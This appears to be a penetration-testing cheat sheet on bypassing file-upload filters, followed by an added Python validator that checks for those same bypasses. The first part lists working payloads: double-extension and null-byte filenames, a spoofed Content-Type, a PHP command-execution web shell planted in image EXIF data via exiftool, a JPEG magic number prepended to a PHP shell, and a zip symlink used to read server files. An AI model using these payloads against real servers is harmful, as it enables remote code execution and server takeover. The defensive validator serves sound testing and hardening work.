Upload File

Which extensions are allowed?

Upload a file. Once the request is captured, send it to Intruder. Click on "Payloads" and select the "Sniper" attack type.

Now click the "Positions" tab, find the filename, and use "Add §" to mark the extension.

Use /usr/share/wordlists/dirb/extensions_common.txt

Uncheck url-encoding

Run the attack

Rename it

shell.php.jpg
shell.png.php
shell.jpeg.php5

Content Type

Content-Disposition: form-data; name="myFile"; filename="php-reverse-shell.php"
Content-Type: application/x-php

#Change to Content-Type: image/jpeg 

Null Byte

blank.php%00.png
blank.php%2500.png

In image - exiftool

root@Host-001:~/Bureau# exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' blank.png
root@Host-001:~/Bureau# mv blank.png blank.php.png

Zip file

ln -s ../ symindex.txt
zip --symlinks test3.zip symindex.txt

1. Upload the zip
2. Visit symindex.txt

Magic Number

Add four "A" on the first line of shell.php.

hexeditor shell.php

Change the first 4 bytes "41 41 41 41" to "FF D8 FF DB" (jpeg magic number)

Result:

00000000  FF D8 FF DB 3C 3F 70 68 70 20 73 79 73 74 65 6D  ....<?php system
00000010  28 24 5F 47 45 54 5B 63 6D 64 5D 29 3B 20 3F 3E  ($_GET[cmd]); ?>
00000020  0A

Save, then verify:

file shell.php
shell.php: JPEG image data
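
Server-side validation that covers the bypasses listed above (double extensions, spoofed Content-Type, null bytes, a prepended magic number, symlinks inside a zip). This is an added example, not part of the original page; the allowlist, the function names and the sample bytes are assumptions constructed for illustration.

```python
import io
import stat
import zipfile
from urllib.parse import unquote

# Assumed policy for this sketch: images only; extension -> required magic number.
ALLOWED = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n"}
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar"}


def check_upload(filename, client_content_type, data):
    """Return the reasons to reject an upload; an empty list means accept.

    client_content_type is ignored on purpose: the client sets it freely.
    """
    reasons = []
    name = filename
    for _ in range(3):  # undo nested percent-encoding such as %2500 -> %00 -> NUL
        name = unquote(name)
    if "\x00" in name:
        reasons.append("null byte in filename")
    parts = name.lower().replace("\x00", "").split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    if ext not in ALLOWED:
        reasons.append("extension not in allowlist")
    elif not data.startswith(ALLOWED[ext]):
        reasons.append("magic number does not match extension")
    if SCRIPT_EXTS.intersection(parts[1:]):  # any dotted segment, not only the last
        reasons.append("script extension in filename")
    if b"<?php" in data.lower():  # heuristic; re-encoding the image is stronger
        reasons.append("PHP open tag in file body")
    return reasons


def zip_symlinks(data):
    """Names of archive members whose Unix mode bits mark them as symlinks."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return [i.filename for i in zf.infolist() if stat.S_ISLNK(i.external_attr >> 16)]


# Constructed samples: a JPEG header followed by a harmless PHP tag, and a clean JPEG header.
JPEG_WITH_PHP = b"\xff\xd8\xff\xdb<?php echo 1; ?>\n"
CLEAN_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16

if __name__ == "__main__":
    print(check_upload("shell.php.jpg", "image/jpeg", JPEG_WITH_PHP))
    print(check_upload("blank.php%2500.png", "image/png", CLEAN_JPEG))
    print(check_upload("photo.jpg", "application/x-php", CLEAN_JPEG))
```

Accepted files should still be stored under a server-generated name outside the web root, so that a missed check does not lead to execution.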
